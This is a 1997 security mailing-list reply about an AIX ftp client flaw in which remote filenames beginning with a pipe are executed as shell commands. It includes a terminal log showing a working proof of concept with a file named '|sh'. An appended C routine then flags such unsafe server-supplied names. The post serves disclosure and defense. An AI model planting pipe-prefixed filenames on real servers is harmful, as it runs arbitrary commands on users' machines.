Re: IBM-ERS Security Vulnerability Alert: The AIX ftp client
From: af@c4c.com
Date: Mon, 3 Nov 1997 10:03:52 -0700
- Next message: Artur Grabowski: "Re: Major security-hole in kerberos rsh, rcp and rlogin."
- Previous message: We got Food - Fuel - Ice-cold Beer - and X.509 certificates: "Re: [seg-l] Passwords en Cisco (fwd)"
- In reply to: Miguel Angel Rodriguez Jodar: "Re: IBM-ERS Security Vulnerability Alert: The AIX ftp client"
- Next in thread: Lutz Donnerhacke: "Re: IBM-ERS Security Vulnerability Alert: The AIX ftp client"
> ers@VNET.IBM.COM wrote:
> > VULNERABILITY: The AIX ftp client interprets server provided
> > filenames
> >
> > I. Description
> >
> > The ftp client can be tricked into running arbitrary commands supplied
> > by the remote server. When the remote file begins with a pipe symbol, the
> > ftp client will process the contents of the remote file as a shell script.
>
> On two machines running AIX 3.2.5 I've tested it, but instead of
> executing the remote file, it searches for a local file with the same
> name as the remote file and executes it with normal user privileges
> instead of root privileges.

Yes, but try "|sh" instead. I've included a log of what happens.

> BTW, I believe that this also happens on HP-UX 9.05

It works on our Linux slackware as well. I suspect most ftp clients are
susceptible to this "problem."

$ id
uid=100(guest) gid=100(usr)
$ pwd
/tmp/ftp-test
$ echo "id > /tmp/OUT" > "|sh"
$ ls -la
total 24
drwxr-xr-x 2 guest usr 512 Nov 3 09:45 .
drwxrwxrwt 6 bin bin 1024 Nov 3 09:44 ..
-rw-r--r-- 1 guest usr 14 Nov 3 09:45 |sh
$ ftp localhost
Connected to localhost.
....snip....
230 User guest logged in.
ftp> cd /tmp/ftp-test
ftp> ls -l
total 24
-rw-r--r-- 1 guest usr 14 Nov 3 09:45 |sh
ftp> mget *
mget |sh? y
150 Opening data connection for |sh (14 bytes).
15 bytes received in 0.2187 seconds (0.06699 Kbytes/s)
local: |sh remote: |sh
ftp> quit
$ ls -l /tmp/OUT
-rw-r--r-- 1 guest usr 28 Nov 3 09:45 /tmp/OUT
$ cat /tmp/OUT
uid=100(guest) gid=100(usr)
$

I also wonder about IBM's answer:

SOLUTION: Remove the setuid bit from the "ftp" command.

On our 4.2.1, ftp will not run if it is not suid. Didn't somebody test this?

Andrew Green
af@c4c.com
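Added example, not code from the thread or from any vendor: a defensive check a client or download wrapper could apply to server-supplied filenames before they become local targets of an mget, so that a name such as "|sh" is refused rather than handed to popen(3). It also scans a constructed listing modelled on the one in the post; all function and enum names are assumed.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>
/* Verdicts for a server-supplied filename (constructed for this example). */
enum name_verdict { NAME_OK = 0, NAME_EMPTY, NAME_PIPE, NAME_PATH, NAME_CONTROL };
/* Decide whether a name taken from a server listing may be used verbatim as the
 * local target of an mget. The leading '|' is the case from the thread: older
 * BSD-derived clients hand such a name to popen(3) instead of fopen(3). */
enum name_verdict classify_remote_name(const char *name) {
    if (name == NULL || name[0] == '\0') return NAME_EMPTY;
    if (name[0] == '|') return NAME_PIPE;            /* "|sh" would become a shell command */
    if (strchr(name, '/') || strstr(name, ".."))     /* would escape the download directory */
        return NAME_PATH;
    for (const unsigned char *p = (const unsigned char *)name; *p; p++)
        if (iscntrl(*p)) return NAME_CONTROL;        /* newline or escape bytes in a listing */
    return NAME_OK;
}
/* Filename in an "ls -l" style line: everything after the eighth field, so names with spaces survive. */
static const char *listing_filename(const char *line) {
    const char *p = line;
    for (int field = 0; field < 8; field++) {
        while (*p != '\0' && !isspace((unsigned char)*p)) p++;
        while (*p != '\0' && isspace((unsigned char)*p)) p++;
        if (*p == '\0') return NULL;                 /* e.g. the "total 24" summary line */
    }
    return p;
}
/* Count listing lines whose filename must not be used as-is. */
int count_unsafe_entries(const char *const *lines, size_t n) {
    int unsafe = 0;
    for (size_t i = 0; i < n; i++) {
        const char *name = listing_filename(lines[i]);
        unsafe += (name != NULL && classify_remote_name(name) != NAME_OK);
    }
    return unsafe;
}
/* Constructed listing modelled on the one in the post: one pipe-prefixed entry. */
static const char *const sample_listing[] = { "total 24",
    "-rw-r--r-- 1 guest usr 14 Nov 3 09:45 |sh",
    "-rw-r--r-- 1 guest usr 40 Nov 3 09:45 notes.txt" };
/* Returns the number of unsafe entries in the constructed listing (1). */
int demo_unsafe_count(void) {
    return count_unsafe_entries(sample_listing, sizeof sample_listing / sizeof *sample_listing);
}
```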